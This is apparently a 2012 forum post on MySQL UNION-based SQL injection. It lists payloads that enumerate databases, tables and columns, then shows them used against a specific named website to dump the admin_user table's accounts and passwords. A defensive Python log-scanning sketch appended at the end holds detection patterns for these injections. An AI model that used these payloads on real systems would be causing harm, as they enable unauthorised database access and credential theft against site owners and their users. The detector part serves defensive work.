Title: MySQL injection techniques
Author: admin
Time: 2012-9-13 16:29

Enumerate databases

id=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*

Enumerate tables

id=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=[hex value of the database name]/**/limit/**/1,1

Enumerate columns

id=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=[hex value of the table name]/**/limit/**/1,1

MySQL 5 advanced injection method: dumping tables

An example follows:

1. Dump tables

http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*

(0x79645F7465616D6E6574 is the hex encoding of the database name yd_teamnet.)

Continuing this way, the admin_user table appeared at the fourth result.

2. Dump columns

http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*

3. Dump passwords

http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/*
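Seen from the defending side, requests like the ones above leave a recognizable trace in web server logs: /**/ comments standing in for spaces, reads from information_schema, and hex-encoded object names. The Python sketch below is an added example, not part of the original post; the rule names, function names and sample log entries are constructed for illustration, with the query strings modelled on the ones in the post.

```python
import re
from urllib.parse import unquote_plus

# Constructed log entries (path and parameter taken from the post, no host).
SAMPLE_REQUESTS = [
    "/ccaus_content.php?ccausid=13240",
    "/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,"
    "TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/"
    "TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*",
    "/ccaus_content.php?ccausid=13240%2F**%2FUNION%2F**%2FSELECT%2F**%2F1,2,3,"
    "concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user",
]

# Closed /* ... */ comments, used in these requests in place of spaces.
INLINE_COMMENT = re.compile(r"/\*.*?\*/", re.S)
# 0x-prefixed literal with an even number of hex digits (a MySQL hex string).
HEX_LITERAL = re.compile(r"\b0x((?:[0-9a-f]{2})+)\b", re.I)
# Hypothetical rule names; each pattern runs on the normalized request only.
RULES = {
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "information_schema": re.compile(
        r"\binformation_schema\s*\.\s*(?:schemata|tables|columns)\b", re.I),
    "concat_dump": re.compile(r"\bconcat\s*\(", re.I),
}

def normalize(request):
    """URL-decode, replace inline comments with spaces, collapse whitespace."""
    text = INLINE_COMMENT.sub(" ", unquote_plus(request))
    return re.sub(r"\s+", " ", text).strip()

def inspect(request):
    """Return the matched rule names and the plaintext of any hex literals."""
    text = normalize(request)
    hits = sorted(name for name, rx in RULES.items() if rx.search(text))
    decoded = [bytes.fromhex(h).decode("utf-8", "replace")
               for h in HEX_LITERAL.findall(text)]
    return {"hits": hits, "decoded": decoded, "normalized": text}

if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        result = inspect(req)
        print(result["hits"], result["decoded"])
```

Decoding the hex literals shows which schema or table a logged request was asking about, which helps scope an incident after the fact.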